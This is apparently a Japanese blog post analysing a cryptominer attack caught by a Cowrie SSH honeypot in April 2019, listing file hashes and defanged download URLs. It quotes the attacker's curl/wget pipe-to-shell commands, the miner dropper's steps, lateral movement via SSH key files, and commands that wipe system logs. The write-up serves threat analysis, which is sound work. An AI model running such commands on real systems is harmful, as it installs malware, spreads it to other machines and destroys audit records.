Cowrieのログ分析(2019/04/02 - 2019/04/03に確認した不審なシェルの解析)
4月3日にCowrieに来ていた攻撃を追ってみました。
一番最初にこの攻撃が観測されたのは4月2日4:48(JST)となります。
sshでログインし、以下のコマンドを入力していました。
(curl -fsSL hxxps://pastebin[.]com/raw/v5XC0BJh||wget -q -O- hxxps://pastebin[].]com/raw/v5XC0BJh)|sh >/dev/null 2>&1 &
それにより、以下のハッシュ値を持つファイルが落ちてきます。
164504ad75f2e714606e986eaea6f869c059fb270e2dd657e63ba88cf633ed43
ファイルの中身は以下のようなものです。
(curl -fsSL hxxps://pastebin[.]com/raw/xmxHzu5P||wget -q -O- hxxps://pastebin[.]com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh
SSHログインし入力したコマンドとほとんど似たようなコマンドが
記載されているファイルが落ちてきていますが、アクセス先が変わっています。
おそらくハニーポット対策として、
ファイルのダウンロードを挟んでいると思われます。
その次には、以下のハッシュ値をもつファイルが落ちてきます。
c588a2c492afbbb730ab6b78c15af63383e92a4ca37ac7c65557c8c835765d2a
ファイルの中身は、CoinMinerのダウンロードと感染拡大を狙うものでした。
大まかな動きを以下に記載します(一部抜粋)
①/tmpフォルダを作成し、権限に
スティキービットを設定しています。
スティキービットを設定することで、どのユーザーからも読み書き実行ができますが、
ファイルの削除は、所有者以外は不可能になります。
mkdir -p /tmp chmod 1777 /tmp
②各種プロセスを落としています。
合計27個のプロセスを落とそうとしていました。
③curlとcronをインストールします。
apt-get install curl -y||yum install curl -y||apk add curl -y apt-get install cron -y||yum install crontabs -y||apk add cron -y
④cronサービスを起動しています。
systemctl start crond systemctl start cron systemctl start crontab service start crond service start cron service start crontab
⑤環境に合わせてELFファイルをダウンロードします。
このファイルがCoinMiner本体となっています。
64bitマシンの場合
以下のハッシュ値を持つELFファイルをどちらかの宛先からダウンロードします
74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8
・hxxp://sowcar[.]com/t6/696/1554470365x2890174166.jpg
・hxxps://pixeldrain[.]com/api/file/t2D_WbHk
32bitマシンの場合
以下のハッシュ値を持つELFファイルをどちらかの宛先からダウンロードします
bab27f611518dc55b00b1a9287bdb8e059c4f4cc1607444f40e0c45d5842994f
・hxxp://sowcar[.]com/t6/696/1554470400x2890174166.jpg
・hxxps://pixeldrain[.]com/api/file/wl_bHMB1
⑥/root/.ssh/known_hosts、/root/.ssh/id_rsa.pub にあるsshの接続情報を用いて、
他のマシンにアクセスし、以下の宛先からファイルのダウンロードを行います。
hxxps://pastebin[.]com/raw/HdjSc4JR
このファイルの中身は、最初にダウンロードしたファイルと同一のファイルとなります。
ハッシュ値:164504ad75f2e714606e986eaea6f869c059fb270e2dd657e63ba88cf633ed43
⑦最後に、ログファイルの記録を上書きし、削除します。
echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron